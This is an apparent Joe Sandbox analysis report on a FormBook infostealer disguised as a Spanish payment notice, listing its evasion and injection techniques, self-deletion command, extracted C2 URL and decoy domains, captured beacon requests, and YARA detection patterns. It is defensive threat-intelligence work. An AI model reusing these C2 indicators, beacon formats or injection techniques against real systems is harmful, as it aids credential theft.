Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Notificaci#U00f3n de pago.exe

Overview

General Information

Sample Name:Notificaci#U00f3n de pago.exe
Analysis ID:626150
MD5:297e8b7f26a2eb1af366cac0202eca9a
SHA1:4b3e36dcd7ea9785f93e43699e1224ad30626148
SHA256:441ba10d2078c45be3d266523f77b59a1478f61ce09f2097ccc276d534c35855
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Notificaci#U00f3n de pago.exe (PID: 6360 cmdline: "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe" MD5: 297E8B7F26A2EB1AF366CAC0202ECA9A)
    • Notificaci#U00f3n de pago.exe (PID: 6968 cmdline: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe MD5: 297E8B7F26A2EB1AF366CAC0202ECA9A)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • WWAHost.exe (PID: 6172 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
          • cmd.exe (PID: 6596 cmdline: /c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.hkqhdq.com/d6fp/"], "decoy": ["cwejman.art", "chandlerfeed.site", "team-ctctitleco.com", "yennyalfonsotorres84.com", "letseatdonuts.com", "runicarcanum.com", "info-center.xyz", "stemcanada.net", "granerde.com", "pixelatedkittys.com", "selfservicerepait.com", "lasvegastechman.com", "massage-rino.com", "bfederation.com", "kjy9.com", "homeiexpress.com", "hayatiorhan.com", "89739134.com", "kristin-feireiss-80.com", "zfp2.xyz", "peq2ulps.com", "redgreenbandits.com", "doblehuella.com", "521xiao.com", "freedomadventurescharters.com", "424259842.xyz", "peachfsg.com", "marketery.net", "dubhmor-dg.com", "sustainabilitymantra.xyz", "obivka.site", "yoursjoysled.com", "neurovirtualusa.com", "938323373.com", "seabornecap.com", "rjxingfu.com", "vacationsimplified.com", "elramony.com", "craftivitycrew.com", "cryptoheritageclub.com", "tcr8.fund", "gloumarc.com", "marry-me-today.com", "screator.life", "tokusou-clean.com", "sagesse.agency", "borilius.com", "www-saber.com", "bondjetfuel.com", "sedadbir.com", "interparking-60years.com", "mdartwork.com", "materialy.pro", "theguiriguide.com", "islandacoustical.com", "einfachmalgut.com", "nonstrappedmedia.club", "librevillegabon.com", "wasatchholidayclassic.net", "shanhaiyizhi.com", "triptoasiam.com", "s3industrail.com", "evertribute.com", "marketing-toolbox.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8f92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x16335:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15de1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x16437:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x165af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x99aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1505c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa722:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18809:$sqlite3step: 68 34 1C 7B E1
    • 0x1891c:$sqlite3step: 68 34 1C 7B E1
    • 0x18838:$sqlite3text: 68 38 2A 90 C5
    • 0x1895d:$sqlite3text: 68 38 2A 90 C5
    • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8f92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x16335:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15de1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x16437:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x165af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x99aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1505c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa722:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      8.0.Notificaci#U00f3n de pago.exe.400000.4.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        8.0.Notificaci#U00f3n de pago.exe.400000.4.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8192:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15535:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14fe1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15637:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x157af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x8baa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1425c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9922:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab87:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bc8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        8.0.Notificaci#U00f3n de pago.exe.400000.4.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a09:$sqlite3step: 68 34 1C 7B E1
        • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a38:$sqlite3text: 68 38 2A 90 C5
        • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
        8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8f92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x16335:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15de1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x16437:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x165af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x99aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1505c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa722:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 22 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.hkqhdq.com/d6fp/"], "decoy": ["cwejman.art", "chandlerfeed.site", "team-ctctitleco.com", "yennyalfonsotorres84.com", "letseatdonuts.com", "runicarcanum.com", "info-center.xyz", "stemcanada.net", "granerde.com", "pixelatedkittys.com", "selfservicerepait.com", "lasvegastechman.com", "massage-rino.com", "bfederation.com", "kjy9.com", "homeiexpress.com", "hayatiorhan.com", "89739134.com", "kristin-feireiss-80.com", "zfp2.xyz", "peq2ulps.com", "redgreenbandits.com", "doblehuella.com", "521xiao.com", "freedomadventurescharters.com", "424259842.xyz", "peachfsg.com", "marketery.net", "dubhmor-dg.com", "sustainabilitymantra.xyz", "obivka.site", "yoursjoysled.com", "neurovirtualusa.com", "938323373.com", "seabornecap.com", "rjxingfu.com", "vacationsimplified.com", "elramony.com", "craftivitycrew.com", "cryptoheritageclub.com", "tcr8.fund", "gloumarc.com", "marry-me-today.com", "screator.life", "tokusou-clean.com", "sagesse.agency", "borilius.com", "www-saber.com", "bondjetfuel.com", "sedadbir.com", "interparking-60years.com", "mdartwork.com", "materialy.pro", "theguiriguide.com", "islandacoustical.com", "einfachmalgut.com", "nonstrappedmedia.club", "librevillegabon.com", "wasatchholidayclassic.net", "shanhaiyizhi.com", "triptoasiam.com", "s3industrail.com", "evertribute.com", "marketing-toolbox.com"]}
          Multi AV Scanner detection for submitted file
          Source: Notificaci#U00f3n de pago.exeVirustotal: Detection: 21%Perma Link
          Source: Notificaci#U00f3n de pago.exeReversingLabs: Detection: 41%
          Yara detected FormBook
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Machine Learning detection for sample
          Source: Notificaci#U00f3n de pago.exeJoe Sandbox ML: detected
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Notificaci#U00f3n de pago.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: Notificaci#U00f3n de pago.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: WWAHost.pdb source: Notificaci#U00f3n de pago.exe, 00000008.00000002.386556688.0000000003820000.00000040.10000000.00040000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381620800.0000000003900000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381239954.0000000003825000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: FormatExcept.pdb8A source: Notificaci#U00f3n de pago.exe
          Source: Binary string: WWAHost.pdbUGP source: Notificaci#U00f3n de pago.exe, 00000008.00000002.386556688.0000000003820000.00000040.10000000.00040000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381620800.0000000003900000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381239954.0000000003825000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Notificaci#U00f3n de pago.exe, 00000008.00000002.384074601.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000002.385236446.0000000001B6F000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.308300902.00000000018B3000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.306800992.000000000171A000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.383100819.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.385157630.0000000003790000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Notificaci#U00f3n de pago.exe, 00000008.00000002.384074601.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000002.385236446.0000000001B6F000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.308300902.00000000018B3000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.306800992.000000000171A000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 0000000E.00000003.383100819.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.385157630.0000000003790000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: FormatExcept.pdb source: Notificaci#U00f3n de pago.exe
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop edi

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 104.195.7.239 80
          Source: C:\Windows\explorer.exeDomain query: www.theguiriguide.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.25 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.212 80
          Source: C:\Windows\explorer.exeDomain query: www.librevillegabon.com
          Source: C:\Windows\explorer.exeDomain query: www.team-ctctitleco.com
          Source: C:\Windows\explorer.exeDomain query: www.evertribute.com
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.hkqhdq.com/d6fp/
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: global trafficHTTP traffic detected: GET /d6fp/?7nxh=0IAMhpyfM6TyxYvNuQBLxFd+VBe1OVp7bFg/8SsVn3OL4Z0v7SAtnQzd8ZWN+7APMfoM&q6AlF=0txdQnwxgb HTTP/1.1Host: www.evertribute.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d6fp/?7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgb HTTP/1.1Host: www.theguiriguide.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d6fp/?7nxh=27dTALvGagYo6W4eiFO6YvZJ//Zn5pBdCa2l5DH7HNM2RGs4GWZbOB9vu5aCQaLmGkAl&q6AlF=0txdQnwxgb HTTP/1.1Host: www.librevillegabon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 192.0.78.25 192.0.78.25
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.263896171.0000000005F96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://en.w
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com.TTF
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html0
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comB.TTF?m
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.312759063.0000000005F90000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.307819527.0000000005F90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coma
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcom
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comlvfetDm
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comm
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.312759063.0000000005F90000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.307819527.0000000005F90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.como)m
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comsief
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266184528.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266049177.0000000005F98000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265980144.0000000005F97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.266184528.0000000005F97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnG
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.266184528.0000000005F97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cne-dio
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.265980144.0000000005F97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnnt
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.277842098.0000000005FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/2
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.277842098.0000000005FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/n
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/)m
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/6m
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Dm
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Mm
          Source: Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
